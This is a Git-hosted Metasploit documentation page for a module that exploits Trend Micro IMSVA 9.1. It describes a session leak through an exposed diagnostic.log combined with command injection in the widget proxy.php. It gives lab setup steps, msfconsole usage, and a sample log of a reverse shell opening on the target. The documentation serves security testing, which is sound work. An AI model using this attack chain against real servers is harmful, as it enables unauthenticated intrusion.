adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
b30641022f02da9420928209ed75ce3bfaa8e780
metasploit-gs/documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md
T
h00die 557a15a115 spelling fixes on docs
2023-10-10 14:46:18 -04:00

3.0 KiB
Raw Blame History

Vulnerable Application

This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.

The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.

Vulnerable Application Installation Steps

IMSVA is distrubed as an ISO image by Trend Micro.

Following steps are valid on the CentOS 6 x64 bit operating system.

  1. Open following URL http://downloadcenter.trendmicro.com/
  2. Find "InterScan Messaging Security (Virtual Appliance)" and click.
  3. At the time of writing this documentation, you must see "IMSVA-9.1-1600-x86-64-r2.iso" next to Download button.
  4. Click to the download button and complete installation of ISO.

If you don't see a affected version of IMSVA, you can try to download IMSVA-9.1-1600 directly from following URL.

http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso

System requirements:

  • Virtualbox or VMware can be used.
  • 4 GB of memory at least.
  • 120 GB of disk size at least.

Verification Steps

A successful check of the exploit will look like this:

  • Start msfconsole
  • use exploit/linux/http/trendmicro_imsva_widget_exec
  • Set RHOST
  • Set LHOST
  • Run check
  • Verify that you are seeing The target appears to be vulnerable.
  • Run exploit
  • Verify that you are seeing Awesome. JSESSIONID value in console.
  • Verify that you are getting Session with widget framework successfully initiated session.

Scenarios

msf > use exploit/linux/http/trendmicro_imsva_widget_exec
msf exploit(trendmicro_imsva_widget_exec) > set RHOST 12.0.0.201
RHOST => 12.0.0.184
msf exploit(trendmicro_imsva_widget_exec) > check
[*] 12.0.0.184:443 The target appears to be vulnerable.
msf exploit(trendmicro_imsva_widget_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = 0567E974AE729E58178C9B513FEBE41E
[*] Initiating session with widget framework
[+] Session with widget framework successfully initiated.
[*] Triggering command injection vulnerability
[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.201:44103) at 2017-10-08 18:05:11 +0300

pwd
/opt/trend/imss/UI/adminUI/ROOT/widget
Reference in New Issue View Git Blame Copy Permalink